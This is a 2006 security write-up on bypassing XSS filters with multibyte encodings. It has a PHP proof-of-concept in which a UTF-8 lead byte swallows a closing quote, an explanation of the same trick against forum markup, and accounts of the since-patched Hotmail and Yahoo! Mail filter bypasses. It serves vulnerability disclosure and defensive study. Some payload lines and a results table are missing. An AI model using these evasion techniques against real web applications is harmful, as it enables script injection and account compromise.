Bypassing Script Filters with Variable-Width Encodings
13 Aug. 2006
As we all know, the main problem in constructing XSS attacks is how to obfuscate the malicious code. In the following paragraphs Cheng explains the concept of bypassing script filters with variable-width encodings and discloses how this concept was applied to the Hotmail and Yahoo! Mail web-based mail services.
A variable-width encoding (a.k.a. variable-length encoding) is a type of character encoding scheme in which codes of differing lengths are used to encode a character set. The most common variable-width encodings are multibyte encodings, which use varying numbers of bytes to encode different characters. Multibyte encodings were first used for Chinese, Japanese and Korean, whose character sets are well in excess of 256 characters. The Unicode standard has two variable-width encodings: UTF-8 and UTF-16. The most commonly used multibyte codes are two-byte codes: the EUC-CN form of GB2312, EUC-JP and EUC-KR are examples of such two-byte EUC codes. There are also some three-byte and four-byte codes.
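To make "variable width" concrete, here is a small Python sketch that measures how many bytes a single character occupies under several of the encodings named above. The sample characters and the helper name encoded_length are chosen for illustration only; the codec names are the ones shipped with Python's standard library.

```python
def encoded_length(char: str, encoding: str) -> int:
    """Return the number of bytes one character occupies in the given encoding."""
    return len(char.encode(encoding))

# UTF-8: 'A', e-acute, a CJK ideograph and an emoji take 1, 2, 3 and 4 bytes.
utf8_lengths = [encoded_length(c, "utf-8")
                for c in ("A", "\u00e9", "\u4e2d", "\U0001F600")]

# UTF-16 (little-endian, no byte order mark): 2 bytes, or 4 for a surrogate pair.
utf16_lengths = [encoded_length(c, "utf-16-le")
                 for c in ("A", "\u4e2d", "\U0001F600")]

# Two-byte EUC codes: ASCII stays at 1 byte, a native character takes 2.
euc_lengths = {
    "gb2312": (encoded_length("A", "gb2312"), encoded_length("\u4e2d", "gb2312")),
    "euc_jp": (encoded_length("A", "euc_jp"), encoded_length("\u3042", "euc_jp")),
    "euc_kr": (encoded_length("A", "euc_kr"), encoded_length("\ud55c", "euc_kr")),
}

print("UTF-8 :", utf8_lengths)
print("UTF-16:", utf16_lengths)
print("EUC   :", euc_lengths)
```

In every one of these encodings the meaning of a byte depends on the bytes before it, which is the property the rest of this article relies on.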
Example and Discussion:
Cheng introduces the idea with the following PHP file.
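<?php
for ($i = 0; $i < 256; $i++) { // assumed loop: one output line per byte value 0-255
    echo "Char $i is <font face=\"xyz".chr($i)."\">not </font>"
        ."<font face=\" onmouseover=alert($i) notexist=".chr($i)."\"     >" // NOTE: 5 space characters following the last \"
        ."available</font>\n";
}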
For most values of $i, Internet Explorer 6.0 (SP2) will display "Char XXX is not available". When $i is between 192 (0xC0) and 255 (0xFF), you will see "Char XXX is available" instead. Take $i=0xC0 as an example and consider the following code:
Char 192 is <font face="xyz[0xC0]">not </font><font face=" onmouseover=alert(192) notexist=[0xC0]"     >available</font>
0xC0 is one of the 32 first bytes of 2-byte sequences (0xC0-0xDF) in UTF-8. So when IE parses the above code, it treats 0xC0 and the quote that follows it as one sequence, and therefore the two FONT elements become one, with "xyz[0xC0]">not </font><font face=" as the value of the FACE attribute. This leaves onmouseover=alert(192) as a live attribute of the merged element. The second 0xC0 starts another 2-byte sequence, which swallows the closing quote and serves as the unquoted value of the NOTEXIST attribute. Because space characters follow that quote, each of 0xE0-0xEF, the first bytes of 3-byte sequences, is taken together with the quote and one space character as the value of the NOTEXIST attribute. Likewise, each first byte of a 4-byte sequence (0xF0-0xF7), a 5-byte sequence (0xF8-0xFB) or a 6-byte sequence (0xFC-0xFD) is taken together with the quote and the space characters that follow it as one sequence.
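The byte swallowing described above can be modelled in a few lines of Python. This is only a simplified sketch of the behaviour, not Internet Explorer's actual decoder: it assumes a parser that trusts the length announced by the first byte and never validates the bytes that follow. The function names (sequence_length, lenient_units, as_seen_by_parser) are hypothetical, and the model covers only the byte ranges listed in the text.

```python
from typing import List

def sequence_length(lead: int) -> int:
    """Length announced by a first byte, using the ranges given in the text."""
    if 0xC0 <= lead <= 0xDF:
        return 2
    if 0xE0 <= lead <= 0xEF:
        return 3
    if 0xF0 <= lead <= 0xF7:
        return 4
    if 0xF8 <= lead <= 0xFB:
        return 5
    if 0xFC <= lead <= 0xFD:
        return 6
    return 1  # ASCII and every other byte are treated as single units here

def lenient_units(data: bytes) -> List[bytes]:
    """Split data into units, trusting the first byte and NOT validating the rest."""
    units = []
    pos = 0
    while pos < len(data):
        length = sequence_length(data[pos])
        units.append(data[pos:pos + length])
        pos += length
    return units

def as_seen_by_parser(data: bytes) -> str:
    """Show each non-ASCII unit as '?', so the ASCII bytes it swallowed disappear."""
    return "".join(
        unit.decode("ascii") if len(unit) == 1 and unit[0] < 0x80 else "?"
        for unit in lenient_units(data)
    )

# The markup produced by the PHP file for $i = 0xC0.
markup = (b'<font face="xyz\xc0">not </font>'
          b'<font face=" onmouseover=alert(192) notexist=\xc0"     >available</font>')
seen = as_seen_by_parser(markup)
print(seen)
```

Under this model only two quote characters survive in the markup for 0xC0, so the FACE value runs from the first element into the second. Calling lenient_units on a 0xE0 byte followed by a quote and spaces shows the quote and exactly one space being absorbed, which is why the PHP file pads the tag with extra spaces.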
Here are the results of the above code as parsed by Internet Explorer 6.0 (SP2), Firefox and Opera 9.0.1 under different variable-width encodings. Note that the numbers in the table are the ranges of "available" characters.
Cheng doesn't think there is one typical way to exploit this, because the technique is very flexible. Just remember that if a web application uses a variable-width encoding, you can bury the characters that follow your entry, and the buried characters might be crucial ones such as a closing quote.
The above code might be exploited in general web applications that allow you to add formatting to your entry in the same way as HTML does. For example, in some forums, [font=Courier New]message[/font] in your message will be transformed into <font face="Courier New">message</font>. Supposing the forum uses UTF-8, we can attack by sending
Again, the exploitation is very flexible, and this FONT-FONT example is only meant to illustrate the idea. The following exploit against Yahoo! Mail is quite different from this one.
Using this method, Cheng found two XSS vulnerabilities, one in Hotmail and one in Yahoo! Mail. Cheng informed Yahoo and Microsoft on April 30 and May 12 respectively, and both have since patched the vulnerabilities.
Yahoo! Mail XSS:
Before Cheng discovered this vulnerability, the Yahoo! Mail filtering engine could already block the "expression()" syntax in a CSS attribute even when a comment was used to break up the word, as in expr/* */ession(). Cheng used [0x81] together with the asterisk that follows it to form one sequence, so that for the browser the second */ would be the one that closes the comment. The filtering engine, however, considered the first two comment symbols to be a pair.
Content-Type: text/html; charset=GB2312